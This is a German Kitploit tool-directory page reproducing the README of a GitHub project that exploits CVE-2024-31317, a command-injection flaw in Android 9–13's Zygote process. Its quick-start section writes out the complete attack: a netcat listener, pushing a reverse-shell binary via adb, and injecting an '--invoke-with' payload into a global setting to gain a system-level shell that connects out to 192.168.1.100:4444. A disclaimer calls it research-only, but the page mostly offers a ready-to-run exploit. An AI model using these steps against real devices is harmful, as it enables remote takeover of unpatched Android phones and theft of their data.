Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-31317-Deployer — CVE-2024-31317 | Kitploit
Tools/GitHubGitHub/kalibb/cve-2024-31317-deployer
Android-SicherheitSchwachstellenanalyseExploitationMobile SicherheitCommand and ControlLernen & BildungPayload-EntwicklungBinary-Exploitation
GitHubkalibb/cve-2024-31317-deployer

CVE-2024-31317-Deployer

CVE-2024-31317

Repository anzeigen
1vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-31317 Deployer

License Android Status

🔒 Erklärung zur Sicherheitsforschung

Dieses Projekt dient ausschließlich Zwecken der Sicherheitsforschung und Bildung. Die Verwendung dieses Tools für unbefugte Tests ist illegal. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden.

📋 Überblick

CVE-2024-31317 ist eine schwerwiegende Sicherheitslücke, die Geräte mit Android 9 bis Android 13 betrifft. Sie ermöglicht Anwendungen mit der Berechtigung WRITE_SECURE_SETTINGS, durch Befehlsinjektion Systemrechte zu erlangen und Code auszuführen.

Dieses Projekt bietet eine detaillierte technische Analyse der Schwachstelle, Proof-of-Concept-Code sowie automatisierte Bereitstellungswerkzeuge.

✨ Hauptfunktionen

  • 📱 Unterstützt alle Android-Versionen 9-13
  • 🛠️ Automatisierte Bereitstellungsskripte
  • 🔄 Reverse-Shell-Verbindung
  • 📊 Detaillierte technische Dokumentation
  • 🎯 Modulares Design

🐛 Schwachstellendetails

  • CVE ID: CVE-2024-31317
  • Schwachstellentyp: Befehlsinjektion
  • Schweregrad: Hoch (High)
  • CVSS-Score: 7.8
  • Betroffene Komponente: Android-Zygote-Prozess
  • Behebungsstatus: Behoben im Android-Sicherheitspatch vom Juni 2024

🎯 Auswirkungsbereich

Betroffene Versionen

  • ✅ Android 9-13

Nicht betroffene Versionen

  • ❌ Android 14+ (behoben)
  • ❌ Geräte mit Sicherheitspatch vom Juni 2024 oder neuer

📁 Projektstruktur

root@kitploit:~
CVE-2024-31317-Deployer/
├── README.md
├── LICENSE
├── VULNERABILITY_ANALYSIS.md
├── reverse_shell.c
├── compile.sh
├── payloads/
├── scripts/
└── docs/

🚀 Schnellstart

1. Projekt klonen

root@kitploit:~
git clone https://github.com/fcy10012/CVE-2024-31317-Deployer.git
cd CVE-2024-31317-Deployer

2. Payload kompilieren

root@kitploit:~
chmod +x compile.sh
./compile.sh

3. Bereitstellung

root@kitploit:~
# 启动监听器
nc -lvnp 4444

# 推送并执行
adb push bin/reverse_shell_arm64 /data/local/tmp/reverse_shell
adb shell chmod 755 /data/local/tmp/reverse_shell

# 注入payload
adb shell settings put global hidden_api_blacklist_exemptions "L*\n--invoke-with /data/local/tmp/reverse_shell 192.168.1.100 4444"

# 触发漏洞
adb shell stop && adb shell start

📚 Dokumentation

  • Detaillierte technische Analyse
  • Payload-Anleitung
  • Vollständiges Benutzerhandbuch

⚠️ Haftungsausschluss

Dieses Projekt dient ausschließlich der Sicherheitsforschung und Bildung. Durch die Verwendung dieses Tools erklären Sie sich damit einverstanden:

  • Alle geltenden Gesetze und Vorschriften einzuhalten
  • Es nur für legitime Sicherheitsforschung zu verwenden
  • Die volle Verantwortung für Ihr Handeln zu übernehmen

📜 Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert – Details finden Sie in der Datei LICENSE

👨‍💻 Autor

fcy10012 - GitHub

🙏 Danksagung

Referenzprojekt: WebLDix/CVE-2024-31317-PoC-Deployer


⭐ Wenn Ihnen dieses Projekt hilft, geben Sie ihm bitte einen Stern!

Tool herunterladen